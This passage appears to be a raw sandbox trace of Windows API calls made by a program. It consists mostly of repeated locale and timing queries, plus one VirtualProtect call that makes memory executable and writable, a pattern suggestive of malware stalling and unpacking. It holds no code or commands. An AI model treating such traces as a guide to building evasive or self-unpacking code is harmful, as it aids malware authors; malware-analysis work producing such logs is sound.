CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0129.003] GetACP () returned 0x4e4 [0129.003] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0129.003] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0129.003] GetACP () returned 0x4e4 [0129.003] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0129.003] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0129.003] GetACP () returned 0x4e4 [0129.003] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0129.003] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0129.003] GetACP () returned 0x4e4 [0129.003] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0129.003] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0129.003] GetACP () returned 0x4e4 [0129.003] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0129.003] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0129.003] GetACP () returned 0x4e4 [0129.004] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0129.004] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0129.004] GetACP () returned 0x4e4 [0129.004] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0129.004] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0129.004] GetACP () returned 0x4e4 [0129.004] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0129.004] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0129.004] GetACP () returned 0x4e4 [0129.004] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0129.004] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0129.004] GetACP () returned 0x4e4 [0129.004] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0129.004] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0129.004] GetACP () returned 0x4e4 [0129.004] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0129.004] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0129.004] GetACP () returned 0x4e4 [0129.004] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0129.004] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0129.005] GetACP () returned 0x4e4 [0129.005] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0129.005] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0129.005] GetACP () returned 0x4e4 [0129.005] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0129.005] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0129.005] GetACP () returned 0x4e4 [0129.005] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0129.005] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0129.005] GetACP () returned 0x4e4 [0129.005] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0129.005] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0129.005] GetACP () returned 0x4e4 [0129.005] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0129.005] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0129.005] GetACP () returned 0x4e4 [0129.005] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0129.005] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0129.005] GetACP () returned 0x4e4 [0129.005] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0129.006] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0129.006] GetACP () returned 0x4e4 [0129.006] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0129.006] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0129.006] GetACP () returned 0x4e4 [0129.006] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0129.006] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0129.006] GetACP () returned 0x4e4 [0129.006] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0129.006] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0129.006] GetACP () returned 0x4e4 [0129.006] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0129.006] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0129.006] GetACP () returned 0x4e4 [0129.006] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0129.006] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0129.006] GetACP () returned 0x4e4 [0129.006] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0129.006] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0129.006] GetACP () returned 0x4e4 [0129.007] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0129.007] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0129.007] GetACP () returned 0x4e4 [0129.007] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0129.007] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0129.007] GetACP () returned 0x4e4 [0129.007] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0129.007] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0129.007] GetACP () returned 0x4e4 [0129.007] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0129.007] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0129.007] GetACP () returned 0x4e4 [0129.007] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0129.007] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0129.007] GetACP () returned 0x4e4 [0129.007] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0129.007] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0129.007] GetACP () returned 0x4e4 [0129.007] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0129.007] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0129.008] GetACP () returned 0x4e4 [0129.008] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0129.008] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0129.008] GetACP () returned 0x4e4 [0129.008] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0129.008] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0129.008] GetACP () returned 0x4e4 [0129.008] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0129.008] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0129.008] GetACP () returned 0x4e4 [0129.008] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0129.008] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0129.008] GetACP () returned 0x4e4 [0129.008] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0129.008] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0129.008] GetACP () returned 0x4e4 [0129.008] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0129.008] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0129.008] GetACP () returned 0x4e4 [0129.008] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0129.009] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0129.009] GetACP () returned 0x4e4 [0129.009] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0129.009] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0129.009] GetACP () returned 0x4e4 [0129.009] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0129.009] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0129.009] GetACP () returned 0x4e4 [0129.009] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0129.009] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0129.009] GetACP () returned 0x4e4 [0129.009] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0129.009] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0129.009] GetACP () returned 0x4e4 [0129.009] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0129.009] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0129.009] GetACP () returned 0x4e4 [0129.009] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0129.009] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0129.009] GetACP () returned 0x4e4 [0129.009] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0129.010] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0129.010] GetACP () returned 0x4e4 [0129.010] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0129.010] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0129.010] GetACP () returned 0x4e4 [0129.010] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0129.010] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0129.010] GetACP () returned 0x4e4 [0129.010] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0129.010] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0129.010] GetACP () returned 0x4e4 [0129.010] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0129.010] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0129.010] GetACP () returned 0x4e4 [0129.010] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0129.010] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0129.010] GetACP () returned 0x4e4 [0129.010] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0129.010] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0129.010] GetACP () returned 0x4e4 [0129.010] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0129.011] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0129.011] GetACP () returned 0x4e4 [0129.011] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0129.011] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0129.011] GetACP () returned 0x4e4 [0129.011] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0129.011] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0129.011] GetACP () returned 0x4e4 [0129.011] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0129.011] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0129.011] GetACP () returned 0x4e4 [0129.011] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0129.011] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0129.011] GetACP () returned 0x4e4 [0129.011] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0129.011] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0129.011] GetACP () returned 0x4e4 [0129.280] VirtualProtect (in: lpAddress=0x2b5ab8, dwSize=0xf2eb, flNewProtect=0x40, lpflOldProtect=0x43ad04 | out: lpflOldProtect=0x43ad04*=0x4) returned 1 [0129.281] AddAtomA (lpString=0x0) returned 0x0 [0129.281] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.281] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.282] AddAtomA (lpString=0x0) returned 0x0 [0129.282] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.282] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.282] AddAtomA (lpString=0x0) returned 0x0 [0129.282] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.282] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.282] AddAtomA (lpString=0x0) returned 0x0 [0129.282] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.282] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.282] AddAtomA (lpString=0x0) returned 0x0 [0129.282] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.282] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.282] AddAtomA (lpString=0x0) returned 0x0 [0129.282] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.282] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.282] AddAtomA (lpString=0x0) returned 0x0 [0129.282] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.282] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.282] AddAtomA (lpString=0x0) returned 0x0 [0129.282] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.282] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.282] AddAtomA (lpString=0x0) returned 0x0 [0129.282] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.282] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.282] AddAtomA (lpString=0x0) returned 0x0 [0129.283] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.283] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.283] AddAtomA (lpString=0x0) returned 0x0 [0129.283] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.283] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.283] AddAtomA (lpString=0x0) returned 0x0 [0129.283] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.283] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.283] AddAtomA (lpString=0x0) returned 0x0 [0129.283] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.283] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.283] AddAtomA (lpString=0x0) returned 0x0 [0129.283] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.283] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.283] AddAtomA (lpString=0x0) returned 0x0 [0129.283] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.283] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.283] AddAtomA (lpString=0x0) returned 0x0 [0129.283] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.283] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.283] AddAtomA (lpString=0x0) returned 0x0 [0129.283] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.283] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.283] AddAtomA (lpString=0x0) returned 0x0 [0129.284] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.284] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.284] AddAtomA (lpString=0x0) returned 0x0 [0129.284] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.284] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.284] AddAtomA (lpString=0x0) returned 0x0 [0129.284] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.284] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.284] AddAtomA (lpString=0x0) returned 0x0 [0129.284] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.284] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.284] AddAtomA (lpString=0x0) returned 0x0 [0129.284] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.284] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.284] AddAtomA (lpString=0x0) returned 0x0 [0129.284] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.284] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.284] AddAtomA (lpString=0x0) returned 0x0 [0129.284] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.284] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.284] AddAtomA (lpString=0x0) returned 0x0 [0129.284] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.284] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.284] AddAtomA (lpString=0x0) returned 0x0 [0129.284] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.284] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: 